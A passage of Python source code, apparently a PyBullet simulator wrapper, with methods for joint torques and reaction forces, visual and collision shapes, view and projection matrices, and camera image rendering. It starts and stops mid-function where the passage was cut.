    torques = self.calculate_inverse_dynamics(body_id, q, dq, accelerations)

    # keep only the torques for the requested joints
    if len(torques) != len(joint_ids):
        # bug fix: body_id was missing here as well
        q_idx = self.get_q_indices(body_id, joint_ids)
        torques = torques[q_idx]

    # apply the torques
    self.set_joint_torques(body_id, joint_ids, torques)
# def get_joint_accelerations(self, body_id, joint_ids): # , q=None, dq=None):
# """
# Get the acceleration at the given joint(s). This is carried out by first getting the joint torques, then
# performing forward dynamics to get the joint accelerations from the joint torques.
#
# Args:
# body_id (int): unique body id.
# joint_ids (int, list[int]): joint id, or list of joint ids.
# q (list[int], None): all the joint positions. If None, it will compute it.
# dq (list[int], None): all the joint velocities. If None, it will compute it.
#
# Returns:
# if 1 joint:
# float: joint acceleration [rad/s^2]
# if multiple joints:
# np.array[float[N]]: joint accelerations [rad/s^2]
# """
# # get the torques
# torques = self.get_joint_torques(body_id, joint_ids)
#
# # get position and velocities
# if q is None or dq is None:
# joints = self.get_actuated_joint_ids(body_id)
# if q is None:
# q = self.get_joint_positions(body_id, joints)
# if dq is None:
# dq = self.get_joint_velocities(body_id, joints)
#
# # compute the accelerations
# accelerations = self.calculate_forward_dynamics(body_id, q, dq, torques=torques)
#
# # return the specified accelerations
# q_idx = self.get_q_indices(body_id, joint_ids)
# return accelerations[q_idx]
def _set_joint_torques(self, body_id, joint_ids, torques):
"""
Set the torque/force to the given joint(s) (using force/torque control).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
torques (float, list[float]): desired torque(s) to apply to the joint(s) [N].
"""
if isinstance(joint_ids, int):
self.sim.setJointMotorControl2(body_id, joint_ids, self.sim.TORQUE_CONTROL, force=torques)
self.sim.setJointMotorControlArray(body_id, joint_ids, self.sim.TORQUE_CONTROL, forces=torques)
def _get_joint_torques(self, body_id, joint_ids):
"""
Get the applied torque(s) on the given joint(s). "This is the motor torque applied during the last `step`.
Note that this only applies in VELOCITY_CONTROL and POSITION_CONTROL. If you use TORQUE_CONTROL then the
applied joint motor torque is exactly what you provide, so there is no need to report it separately." [1]
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
float: torque [Nm]
if multiple joints:
np.array[float[N]]: torques associated to the given joints [Nm]
"""
if isinstance(joint_ids, int):
return self.sim.getJointState(body_id, joint_ids)[3]
return np.asarray([state[3] for state in self.sim.getJointStates(body_id, joint_ids)])
def get_joint_reaction_forces(self, body_id, joint_ids):
    """
    Return the joint reaction forces at the given joint(s). Note that the torque sensor must be
    enabled first, otherwise this always returns [0,0,0,0,0,0].

    Args:
        body_id (int): unique body id.
        joint_ids (int, int[N]): joint id, or list of joint ids.

    Returns:
        np.array[float[6]]: reaction force (fx,fy,fz,mx,my,mz) [N,Nm], if a single joint id was given.
        np.array[float[N,6]]: reaction forces of each joint [N,Nm], if a list was given.
    """
    if isinstance(joint_ids, int):
        return np.asarray(self.sim.getJointState(body_id, joint_ids)[2])
    states = self.sim.getJointStates(body_id, joint_ids)
    return np.asarray([state[2] for state in states])
def get_joint_powers(self, body_id, joint_ids):
    """
    Return the applied power at the given joint(s), computed as power = torque * velocity.

    Args:
        body_id (int): unique body id.
        joint_ids (int, int[N]): joint id, or list of joint ids.

    Returns:
        float: joint power [W], if a single joint id was given.
        np.array[float[N]]: power at each joint [W], if a list was given.
    """
    torques = self.get_joint_torques(body_id, joint_ids)
    velocities = self.get_joint_velocities(body_id, joint_ids)
    return torques * velocities
#################
# visualization #
#################
def create_visual_shape(self, shape_type, radius=0.5, half_extents=(1., 1., 1.), length=1., filename=None,
                        mesh_scale=(1., 1., 1.), plane_normal=(0., 0., 1.), flags=-1, rgba_color=None,
                        specular_color=None, visual_frame_position=None, vertices=None, indices=None, uvs=None,
                        normals=None, visual_frame_orientation=None):
    """
    Create a visual shape in the simulator.

    Args:
        shape_type (int): type of shape; GEOM_SPHERE (=2), GEOM_BOX (=3), GEOM_CAPSULE (=7),
            GEOM_CYLINDER (=4), GEOM_PLANE (=6), GEOM_MESH (=5)
        radius (float): only for GEOM_SPHERE, GEOM_CAPSULE, GEOM_CYLINDER
        half_extents (np.array[float[3]], list/tuple of 3 floats): only for GEOM_BOX.
        length (float): only for GEOM_CAPSULE, GEOM_CYLINDER (length = height).
        filename (str): filename for GEOM_MESH, currently only Wavefront .obj. Will create convex hulls
            for each object (marked as 'o') in the .obj file.
        mesh_scale (np.array[float[3]], list/tuple of 3 floats): scale of mesh (only for GEOM_MESH).
        plane_normal (np.array[float[3]], list/tuple of 3 floats): plane normal (only for GEOM_PLANE).
        flags (int): unused / to be decided
        rgba_color (list/tuple of 4 floats): red/green/blue/alpha components, each in range [0..1].
        specular_color (list/tuple of 3 floats): specular reflection color, RGB components in range [0..1].
        visual_frame_position (np.array[float[3]]): translational offset of the visual shape with respect
            to the link frame.
        vertices (list of np.array[float[3]]): instead of creating a mesh from an obj file, you can
            provide vertices, indices, uvs and normals.
        indices (list[int]): triangle indices, should be a multiple of 3.
        uvs (list of np.array[2]): uv texture coordinates for vertices; use changeVisualShape to choose
            the texture image. Must match the number of vertices.
        normals (list of np.array[float[3]]): vertex normals; must match the number of vertices.
        visual_frame_orientation (np.array[float[4]]): rotational offset (quaternion x,y,z,w) of the
            visual shape with respect to the link frame.

    Returns:
        int: non-negative unique id for the visual shape, or -1 if the call failed.

    Raises:
        ValueError: if `shape_type` is not one of the supported GEOM_* constants.
    """
    # common optional appearance/pose arguments
    kwargs = {}
    for key, value in (('rgbaColor', rgba_color), ('specularColor', specular_color),
                       ('visualFramePosition', visual_frame_position),
                       ('visualFrameOrientation', visual_frame_orientation)):
        if value is not None:
            kwargs[key] = value

    # geometry-specific arguments
    if shape_type == self.sim.GEOM_SPHERE:
        kwargs['radius'] = radius
    elif shape_type == self.sim.GEOM_BOX:
        kwargs['halfExtents'] = half_extents
    elif shape_type in (self.sim.GEOM_CAPSULE, self.sim.GEOM_CYLINDER):
        kwargs['radius'] = radius
        kwargs['length'] = length
    elif shape_type == self.sim.GEOM_PLANE:
        kwargs['planeNormal'] = plane_normal
    elif shape_type == self.sim.GEOM_MESH:
        if filename is not None:
            kwargs['fileName'] = filename
        else:
            # build the mesh from explicitly provided geometry instead of a file
            for key, value in (('vertices', vertices), ('indices', indices),
                               ('uvs', uvs), ('normals', normals)):
                if value is not None:
                    kwargs[key] = value
    else:
        raise ValueError("Unknown visual shape type.")

    return self.sim.createVisualShape(shape_type, **kwargs)
def get_visual_shape_data(self, object_id, flags=-1):
    """
    Get the visual shape data associated with the given object id, as a list of visual shape entries.

    Args:
        object_id (int): object unique id.
        flags (int, None): VISUAL_SHAPE_DATA_TEXTURE_UNIQUE_IDS (=1) will also provide `texture_unique_id`.

    Returns:
        list: one entry per visual shape, each a list of:
            int: object unique id.
            int: link index or -1 for the base.
            int: visual geometry type (TBD).
            np.array[float[3]]: dimensions (size, local scale) of the geometry.
            str: path to the triangle mesh, if any. Typically relative to the URDF, SDF or MJCF file
                location, but could be absolute.
            np.array[float[3]]: position of local visual frame, relative to link/joint frame.
            np.array[float[4]]: orientation of local visual frame relative to link/joint frame.
            list[float[4]]: URDF color (if any specified) in Red / Green / Blue / Alpha.
            int: texture unique id of the shape or -1 if None. Present only with the
                VISUAL_SHAPE_DATA_TEXTURE_UNIQUE_IDS (=1) flag.
    """
    shapes = []
    for shape in self.sim.getVisualShapeData(object_id, flags=flags):
        entry = list(shape)
        # convert geometry dimensions and the local frame pose to numpy arrays
        entry[3] = np.asarray(shape[3])
        entry[5] = np.asarray(shape[5])
        entry[6] = np.asarray(shape[6])
        shapes.append(entry)
    return shapes
def change_visual_shape(self, object_id, link_id, shape_id=None, texture_id=None, rgba_color=None,
                        specular_color=None):
    """
    Change the texture, RGBA color, and other visual properties of a shape.

    Args:
        object_id (int): unique object id.
        link_id (int): link id.
        shape_id (int): shape id.
        texture_id (int): texture id.
        rgba_color (float[4]): RGBA color, each in range [0..1]. Alpha has to be 0 (invisible) or 1
            (visible) at the moment.
        specular_color (int[3]): specular color components (RED, GREEN, BLUE), can be from 0 to large
            numbers (>100).
    """
    options = {}
    for key, value in (('shapeIndex', shape_id), ('textureUniqueId', texture_id),
                       ('rgbaColor', rgba_color), ('specularColor', specular_color)):
        if value is not None:
            options[key] = value
    self.sim.changeVisualShape(object_id, link_id, **options)
def load_texture(self, filename):
    """
    Load a texture from file.

    The returned id can be used with `change_visual_shape` to apply the texture to a shape.

    Args:
        filename (str): path to the texture file.

    Returns:
        int: texture unique id; non-negative if the texture was loaded successfully.
    """
    texture_id = self.sim.loadTexture(filename)
    return texture_id
def compute_view_matrix(self, eye_position, target_position, up_vector):
    """Compute the view matrix.

    The view matrix is the 4x4 matrix that maps world coordinates into camera coordinates: it applies
    a rotation and translation such that the world sits in front of a fixed camera (rather than moving
    the camera itself).

    Args:
        eye_position (np.array[float[3]]): eye position in Cartesian world coordinates
        target_position (np.array[float[3]]): position of the target (focus) point in Cartesian world coordinates
        up_vector (np.array[float[3]]): up vector of the camera in Cartesian world coordinates

    Returns:
        np.array[float[4,4]]: the view matrix

    More info:
        [1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
        [2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
    """
    flat = self.sim.computeViewMatrix(cameraEyePosition=eye_position, cameraTargetPosition=target_position,
                                      cameraUpVector=up_vector)
    # pybullet returns the 16 values in column-major order; reshape and transpose to row-major
    return np.transpose(np.reshape(np.asarray(flat), (4, 4)))
def compute_view_matrix_from_ypr(self, target_position, distance, yaw, pitch, roll, up_axis_index=2):
    """Compute the view matrix from yaw, pitch, and roll angles.

    The view matrix is the 4x4 matrix that maps world coordinates into camera coordinates: it applies
    a rotation and translation such that the world sits in front of a fixed camera (rather than moving
    the camera itself).

    Args:
        target_position (np.array[float[3]]): target focus point in Cartesian world coordinates
        distance (float): distance from eye to focus point
        yaw (float): yaw angle in radians left/right around up-axis
        pitch (float): pitch in radians up/down.
        roll (float): roll in radians around forward vector
        up_axis_index (int): either 1 for Y or 2 for Z axis up.

    Returns:
        np.array[float[4,4]]: the view matrix

    More info:
        [1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
        [2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
    """
    # pybullet expects the angles in degrees; this API takes radians
    flat = self.sim.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=target_position,
                                                      distance=distance,
                                                      yaw=np.rad2deg(yaw),
                                                      pitch=np.rad2deg(pitch),
                                                      roll=np.rad2deg(roll),
                                                      upAxisIndex=up_axis_index)
    return np.transpose(np.reshape(np.asarray(flat), (4, 4)))
def compute_projection_matrix(self, left, right, bottom, top, near, far):
    """Compute the 4x4 orthographic projection matrix.

    The projection matrix maps camera/eye coordinates to clipped coordinates and is applied after
    the view matrix. For the perspective projection, see `compute_projection_matrix_fov`.

    Args:
        left (float): left screen (canvas) coordinate
        right (float): right screen (canvas) coordinate
        bottom (float): bottom screen (canvas) coordinate
        top (float): top screen (canvas) coordinate
        near (float): near plane distance
        far (float): far plane distance

    Returns:
        np.array[float[4,4]]: the orthographic projection matrix

    More info:
        [1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
        [2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
    """
    # PyBullet returns a flat column-major list of 16 floats; transpose after reshaping.
    flat_proj = self.sim.computeProjectionMatrix(left, right, bottom, top, near, far)
    return np.asarray(flat_proj).reshape((4, 4)).T
def compute_projection_matrix_fov(self, fov, aspect, near, far):
    """Compute the 4x4 perspective projection matrix from the field of view (FOV).

    Args:
        fov (float): field of view
        aspect (float): aspect ratio
        near (float): near plane distance
        far (float): far plane distance

    Returns:
        np.array[float[4,4]]: the perspective projection matrix

    More info:
        [1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
        [2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
    """
    # PyBullet returns a flat column-major list of 16 floats; transpose after reshaping.
    flat_proj = self.sim.computeProjectionMatrixFOV(fov, aspect, near, far)
    return np.asarray(flat_proj).reshape((4, 4)).T
def get_camera_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
                     light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
                     light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
    """
    Return the RGBA image, depth buffer, and segmentation mask rendered by the simulator camera.

    Note that copying pixels from C/C++ to Python can be really slow for large images, unless PyBullet
    is compiled with NumPy enabled (check with `PyBullet.isNumpyEnabled()`); `pip install pybullet` has
    NumPy enabled, if available on the system.

    Args:
        width (int): horizontal image resolution in pixels
        height (int): vertical image resolution in pixels
        view_matrix (np.array[float[4,4]], list, None): 4x4 view matrix, see `compute_view_matrix`
        projection_matrix (np.array[float[4,4]], list, None): 4x4 projection matrix, see
            `compute_projection_matrix`
        light_direction (np.array[float[3]], None): world position of the light source; the direction is
            from the light source position to the origin of the world frame.
        light_color (np.array[float[3]], None): directional light color in [RED, GREEN, BLUE], each in 0..1
        light_distance (float, None): distance of the light along the normalized `light_direction`
        shadow (bool, None): True for shadows, False for no shadows
        light_ambient_coeff (float, None): light ambient coefficient
        light_diffuse_coeff (float, None): light diffuse coefficient
        light_specular_coeff (float, None): light specular coefficient
        renderer (int, None): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that
            DIRECT (=2) mode has no OpenGL, so it requires ER_TINY_RENDERER.
        flags (int, None): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1) to combine body id and link
            index in the segmentation mask, or ER_NO_SEGMENTATION_MASK (=4) to skip computing it.

    Returns:
        int: width image resolution in pixels (horizontal)
        int: height image resolution in pixels (vertical)
        np.array[int[width, height, 4]]: RGBA pixels (each channel in the range [0..255]).
        np.array[float[width, height]]: depth buffer (non-linear OpenGL z-buffer); the metric depth is
            `depth = far * near / (far - (far - near) * depthImg)`.
        np.array[int[width, height]]: segmentation mask buffer with the visible object unique id per pixel.
            With ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX, value = objectUniqueId + (linkIndex+1)<<24.
    """
    kwargs = {}
    if view_matrix is not None:
        if isinstance(view_matrix, np.ndarray):
            # PyBullet expects a flat, column-major list of 16 floats.
            view_matrix = view_matrix.T.ravel().tolist()
        kwargs['viewMatrix'] = view_matrix
    if projection_matrix is not None:
        if isinstance(projection_matrix, np.ndarray):
            projection_matrix = projection_matrix.T.ravel().tolist()
        kwargs['projectionMatrix'] = projection_matrix
    if light_direction is not None:
        if isinstance(light_direction, np.ndarray):
            light_direction = light_direction.ravel().tolist()
        kwargs['lightDirection'] = light_direction
    if light_color is not None:
        if isinstance(light_color, np.ndarray):
            # fix: the ndarray branch previously passed the array through unconverted (dead branch);
            # flatten to a list for consistency with the other vector arguments.
            light_color = light_color.ravel().tolist()
        kwargs['lightColor'] = light_color
    if light_distance is not None:
        kwargs['lightDistance'] = light_distance
    if shadow is not None:
        kwargs['shadow'] = int(shadow)
    if light_ambient_coeff is not None:
        kwargs['lightAmbientCoeff'] = light_ambient_coeff
    if light_diffuse_coeff is not None:
        kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
    if light_specular_coeff is not None:
        kwargs['lightSpecularCoeff'] = light_specular_coeff
    if renderer is not None:
        kwargs['renderer'] = renderer
    if flags is not None:
        kwargs['flags'] = flags
    width, height = int(width), int(height)
    width, height, rgba, depth, segmentation = self.sim.getCameraImage(width, height, **kwargs)
    # NOTE(review): PyBullet renders row-major (height, width) buffers; reshaping to (width, height)
    # matches this wrapper's documented convention but would swap rows/columns for non-square images —
    # TODO confirm against callers before changing.
    rgba = np.asarray(rgba).reshape(width, height, 4)
    depth = np.asarray(depth).reshape(width, height)
    segmentation = np.asarray(segmentation).reshape(width, height)
    return width, height, rgba, depth, segmentation
def get_rgba_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
                   light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
                   light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
    """
    Return the RGBA image rendered by the simulator camera.

    Note that copying pixels from C/C++ to Python can be really slow for large images, unless PyBullet
    is compiled with NumPy enabled (check with `PyBullet.isNumpyEnabled()`).

    Args:
        width (int): horizontal image resolution in pixels
        height (int): vertical image resolution in pixels
        view_matrix (np.array[float[4,4]], list, None): 4x4 view matrix, see `compute_view_matrix`
        projection_matrix (np.array[float[4,4]], list, None): 4x4 projection matrix, see
            `compute_projection_matrix`
        light_direction (np.array[float[3]], None): world position of the light source; the direction is
            from the light source position to the origin of the world frame.
        light_color (np.array[float[3]], None): directional light color in [RED, GREEN, BLUE], each in 0..1
        light_distance (float, None): distance of the light along the normalized `light_direction`
        shadow (bool, None): True for shadows, False for no shadows
        light_ambient_coeff (float, None): light ambient coefficient
        light_diffuse_coeff (float, None): light diffuse coefficient
        light_specular_coeff (float, None): light specular coefficient
        renderer (int, None): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that
            DIRECT (=2) mode has no OpenGL, so it requires ER_TINY_RENDERER.
        flags (int, None): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1), or ER_NO_SEGMENTATION_MASK (=4)
            to avoid calculating the segmentation mask.

    Returns:
        np.array[int[width, height, 4]]: RGBA pixels (each channel in the range [0..255]).
    """
    kwargs = {}
    if view_matrix is not None:
        if isinstance(view_matrix, np.ndarray):
            # PyBullet expects a flat, column-major list of 16 floats.
            view_matrix = view_matrix.T.ravel().tolist()
        kwargs['viewMatrix'] = view_matrix
    if projection_matrix is not None:
        if isinstance(projection_matrix, np.ndarray):
            projection_matrix = projection_matrix.T.ravel().tolist()
        kwargs['projectionMatrix'] = projection_matrix
    if light_direction is not None:
        if isinstance(light_direction, np.ndarray):
            light_direction = light_direction.ravel().tolist()
        kwargs['lightDirection'] = light_direction
    if light_color is not None:
        if isinstance(light_color, np.ndarray):
            # fix: the ndarray branch previously passed the array through unconverted (dead branch);
            # flatten to a list for consistency with the other vector arguments.
            light_color = light_color.ravel().tolist()
        kwargs['lightColor'] = light_color
    if light_distance is not None:
        kwargs['lightDistance'] = light_distance
    if shadow is not None:
        kwargs['shadow'] = int(shadow)
    if light_ambient_coeff is not None:
        kwargs['lightAmbientCoeff'] = light_ambient_coeff
    if light_diffuse_coeff is not None:
        kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
    if light_specular_coeff is not None:
        kwargs['lightSpecularCoeff'] = light_specular_coeff
    if renderer is not None:
        kwargs['renderer'] = renderer
    if flags is not None:
        kwargs['flags'] = flags
    # getCameraImage returns (width, height, rgba, depth, segmentation); keep only the RGBA buffer.
    img = np.asarray(self.sim.getCameraImage(width, height, **kwargs)[2])
    img = img.reshape(width, height, 4)  # RGBA
    return img
def get_depth_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
                    light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
                    light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
    """
    Return the depth buffer rendered by the simulator camera.

    Note that copying pixels from C/C++ to Python can be really slow for large images, unless PyBullet
    is compiled with NumPy enabled (check with `PyBullet.isNumpyEnabled()`).

    Args:
        width (int): horizontal image resolution in pixels
        height (int): vertical image resolution in pixels
        view_matrix (np.array[float[4,4]], list, None): 4x4 view matrix, see `compute_view_matrix`
        projection_matrix (np.array[float[4,4]], list, None): 4x4 projection matrix, see
            `compute_projection_matrix`
        light_direction (np.array[float[3]], None): world position of the light source; the direction is
            from the light source position to the origin of the world frame.
        light_color (np.array[float[3]], None): directional light color in [RED, GREEN, BLUE], each in 0..1
        light_distance (float, None): distance of the light along the normalized `light_direction`
        shadow (bool, None): True for shadows, False for no shadows
        light_ambient_coeff (float, None): light ambient coefficient
        light_diffuse_coeff (float, None): light diffuse coefficient
        light_specular_coeff (float, None): light specular coefficient
        renderer (int, None): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that
            DIRECT (=2) mode has no OpenGL, so it requires ER_TINY_RENDERER.
        flags (int, None): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1), or ER_NO_SEGMENTATION_MASK (=4)
            to avoid calculating the segmentation mask.

    Returns:
        np.array[float[width, height]]: depth buffer (non-linear OpenGL z-buffer); the metric depth is
            `depth = far * near / (far - (far - near) * depthImg)`.
    """
    kwargs = {}
    if view_matrix is not None:
        if isinstance(view_matrix, np.ndarray):
            # PyBullet expects a flat, column-major list of 16 floats.
            view_matrix = view_matrix.T.ravel().tolist()
        kwargs['viewMatrix'] = view_matrix
    if projection_matrix is not None:
        if isinstance(projection_matrix, np.ndarray):
            projection_matrix = projection_matrix.T.ravel().tolist()
        kwargs['projectionMatrix'] = projection_matrix
    if light_direction is not None:
        if isinstance(light_direction, np.ndarray):
            light_direction = light_direction.ravel().tolist()
        kwargs['lightDirection'] = light_direction
    if light_color is not None:
        if isinstance(light_color, np.ndarray):
            # fix: the ndarray branch previously passed the array through unconverted (dead branch);
            # flatten to a list for consistency with the other vector arguments.
            light_color = light_color.ravel().tolist()
        kwargs['lightColor'] = light_color
    if light_distance is not None:
        kwargs['lightDistance'] = light_distance
    if shadow is not None:
        kwargs['shadow'] = int(shadow)
    if light_ambient_coeff is not None:
        kwargs['lightAmbientCoeff'] = light_ambient_coeff
    if light_diffuse_coeff is not None:
        kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
    if light_specular_coeff is not None:
        kwargs['lightSpecularCoeff'] = light_specular_coeff
    if renderer is not None:
        kwargs['renderer'] = renderer
    if flags is not None:
        kwargs['flags'] = flags
    # getCameraImage returns (width, height, rgba, depth, segmentation); keep only the depth buffer.
    img = np.asarray(self.sim.getCameraImage(width, height, **kwargs)[3])
    img = img.reshape(width, height)
    return img
def get_segmentation_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
                           light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
                           light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
    """
    Return the segmentation mask buffer rendered by the simulator camera, with the body unique id of
    the visible object for each pixel.

    Note that copying pixels from C/C++ to Python can be really slow for large images, unless PyBullet
    is compiled with NumPy enabled (check with `PyBullet.isNumpyEnabled()`).

    Args:
        width (int): horizontal image resolution in pixels
        height (int): vertical image resolution in pixels
        view_matrix (np.array[float[4,4]], list, None): 4x4 view matrix, see `compute_view_matrix`
        projection_matrix (np.array[float[4,4]], list, None): 4x4 projection matrix, see
            `compute_projection_matrix`
        light_direction (np.array[float[3]], None): world position of the light source; the direction is
            from the light source position to the origin of the world frame.
        light_color (np.array[float[3]], None): directional light color in [RED, GREEN, BLUE], each in 0..1
        light_distance (float, None): distance of the light along the normalized `light_direction`
        shadow (bool, None): True for shadows, False for no shadows
        light_ambient_coeff (float, None): light ambient coefficient
        light_diffuse_coeff (float, None): light diffuse coefficient
        light_specular_coeff (float, None): light specular coefficient
        renderer (int, None): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that
            DIRECT (=2) mode has no OpenGL, so it requires ER_TINY_RENDERER.
        flags (int, None): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1) to combine body id and link
            index in the mask, or ER_NO_SEGMENTATION_MASK (=4) to avoid calculating it.

    Returns:
        np.array[int[width, height]]: segmentation mask buffer with the visible object unique id per pixel.
            With ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX, value = objectUniqueId + (linkIndex+1)<<24,
            so a free-floating body without joints/links has mask value equal to its body unique id
            (its link index is -1).
    """
    kwargs = {}
    if view_matrix is not None:
        if isinstance(view_matrix, np.ndarray):
            # PyBullet expects a flat, column-major list of 16 floats.
            view_matrix = view_matrix.T.ravel().tolist()
        kwargs['viewMatrix'] = view_matrix
    if projection_matrix is not None:
        if isinstance(projection_matrix, np.ndarray):
            projection_matrix = projection_matrix.T.ravel().tolist()
        kwargs['projectionMatrix'] = projection_matrix
    if light_direction is not None:
        if isinstance(light_direction, np.ndarray):
            light_direction = light_direction.ravel().tolist()
        kwargs['lightDirection'] = light_direction
    if light_color is not None:
        if isinstance(light_color, np.ndarray):
            # fix: the ndarray branch previously passed the array through unconverted (dead branch);
            # flatten to a list for consistency with the other vector arguments.
            light_color = light_color.ravel().tolist()
        kwargs['lightColor'] = light_color
    if light_distance is not None:
        kwargs['lightDistance'] = light_distance
    if shadow is not None:
        kwargs['shadow'] = int(shadow)
    if light_ambient_coeff is not None:
        kwargs['lightAmbientCoeff'] = light_ambient_coeff
    if light_diffuse_coeff is not None:
        kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
    if light_specular_coeff is not None:
        kwargs['lightSpecularCoeff'] = light_specular_coeff
    if renderer is not None:
        kwargs['renderer'] = renderer
    if flags is not None:
        kwargs['flags'] = flags
    # getCameraImage returns (width, height, rgba, depth, segmentation); keep only the mask buffer.
    img = np.asarray(self.sim.getCameraImage(width, height, **kwargs)[4])
    img = img.reshape(width, height)
    return img
##############
# Collisions #
##############
def create_collision_shape(self, shape_type, radius=0.5, half_extents=(1., 1., 1.), height=1., filename=None,
                           mesh_scale=(1., 1., 1.), plane_normal=(0., 0., 1.), flags=-1,
                           collision_frame_position=None, collision_frame_orientation=None):
    """
    Create a collision shape in the simulator.

    Args:
        shape_type (int): type of shape; GEOM_SPHERE (=2), GEOM_BOX (=3), GEOM_CAPSULE (=7),
            GEOM_CYLINDER (=4), GEOM_PLANE (=6), GEOM_MESH (=5)
        radius (float): only for GEOM_SPHERE, GEOM_CAPSULE, GEOM_CYLINDER
        half_extents (np.array[float[3]], list/tuple of 3 floats): only for GEOM_BOX.
        height (float): only for GEOM_CAPSULE, GEOM_CYLINDER (length = height).
        filename (str): filename for GEOM_MESH, currently only Wavefront .obj. Will create convex hulls
            for each object (marked as 'o') in the .obj file.
        mesh_scale (np.array[float[3]], list/tuple of 3 floats): scale of mesh (only for GEOM_MESH).
        plane_normal (np.array[float[3]], list/tuple of 3 floats): plane normal (only for GEOM_PLANE).
        flags (int): unused / to be decided
        collision_frame_position (np.array[float[3]]): translational offset of the collision shape with
            respect to the link frame
        collision_frame_orientation (np.array[float[4]]): rotational offset (quaternion x,y,z,w) of the
            collision shape with respect to the link frame

    Returns:
        int: a non-negative unique id for the collision shape, or -1 if the call failed.

    Raises:
        ValueError: if `shape_type` is not one of the supported geometry types.
    """
    # Optional frame offsets shared by all geometry types.
    kwargs = {}
    if collision_frame_position is not None:
        kwargs['collisionFramePosition'] = collision_frame_position
    if collision_frame_orientation is not None:
        kwargs['collisionFrameOrientation'] = collision_frame_orientation
    if shape_type == self.sim.GEOM_SPHERE:
        return self.sim.createCollisionShape(shape_type, radius=radius, **kwargs)
    elif shape_type == self.sim.GEOM_BOX:
        return self.sim.createCollisionShape(shape_type, halfExtents=half_extents, **kwargs)
    elif shape_type == self.sim.GEOM_CAPSULE or shape_type == self.sim.GEOM_CYLINDER:
        return self.sim.createCollisionShape(shape_type, radius=radius, height=height, **kwargs)
    elif shape_type == self.sim.GEOM_PLANE:
        return self.sim.createCollisionShape(shape_type, planeNormal=plane_normal, **kwargs)
    elif shape_type == self.sim.GEOM_MESH:
        # fix: `mesh_scale` was documented but never forwarded, so meshes silently ignored the scale.
        return self.sim.createCollisionShape(shape_type, fileName=filename, meshScale=mesh_scale, **kwargs)
    else:
        raise ValueError("Unknown collision shape type.")
def get_collision_shape_data(self, object_id, link_id=-1):
    """
    Get the collision shape data associated with the specified object id and link id. If the given
    object id has no collision shape, it returns an empty tuple.

    Args:
        object_id (int): object unique id.
        link_id (int): link index or -1 for the base.

    Returns:
        if not has_collision_shape_data:
            tuple: empty tuple
        else:
            int: object unique id.
            int: link id.
            int: geometry type; GEOM_BOX (=3), GEOM_SPHERE (=2), GEOM_CAPSULE (=7), GEOM_MESH (=5),
                GEOM_PLANE (=6)
            np.array[float[3]]: dimensions, depending on geometry type:
                for GEOM_BOX: extents,
                for GEOM_SPHERE: dimensions[0] = radius,
                for GEOM_CAPSULE and GEOM_CYLINDER: dimensions[0] = height (length),
                    dimensions[1] = radius.
                for GEOM_MESH: dimensions is the scaling factor.
            str: only for GEOM_MESH: file name (and path) of the collision mesh asset.
            np.array[float[3]]: local position of the collision frame with respect to the center of
                mass/inertial frame
            np.array[float[4]]: local orientation of the collision frame with respect to the inertial frame
    """
    collision = self.sim.getCollisionShapeData(object_id, link_id)
    if len(collision) == 0:
        return collision
    # fix: PyBullet returns a *list* of per-shape records; unpacking the list itself into 7 fields
    # raised a ValueError whenever data was present. Unpack the first (and typically only) record.
    object_id, link_id, geom_type, dimensions, filename, position, orientation = collision[0]
    return object_id, link_id, geom_type, np.asarray(dimensions), filename, np.asarray(position), \
        np.asarray(orientation)
def get_overlapping_objects(self, aabb_min, aabb_max):
    """
    Return the unique ids of all objects whose Axis Aligned Bounding Box (AABB) overlaps the given
    axis-aligned bounding box.

    The query is conservative and may return extra objects with no actual AABB overlap, because the
    acceleration structures heuristically enlarge the AABBs (extra margin, extrusion along the velocity
    vector).

    Args:
        aabb_min (np.array[float[3]]): minimum coordinates of the aabb
        aabb_max (np.array[float[3]]): maximum coordinates of the aabb

    Returns:
        list[int]: list of object unique ids.
    """
    overlapping = self.sim.getOverlappingObjects(aabb_min, aabb_max)
    return overlapping
def get_aabb(self, body_id, link_id=-1):
    """
    Query the axis-aligned bounding box (in world space) of a given object, and optionally of one of
    its links. Omitting the link index (or passing -1) returns the AABB of the base.

    Args:
        body_id (int): object unique id as returned by creation methods
        link_id (int): link index in range [0..`getNumJoints(..)`]

    Returns:
        np.array[float[3]]: minimum coordinates of the axis-aligned bounding box
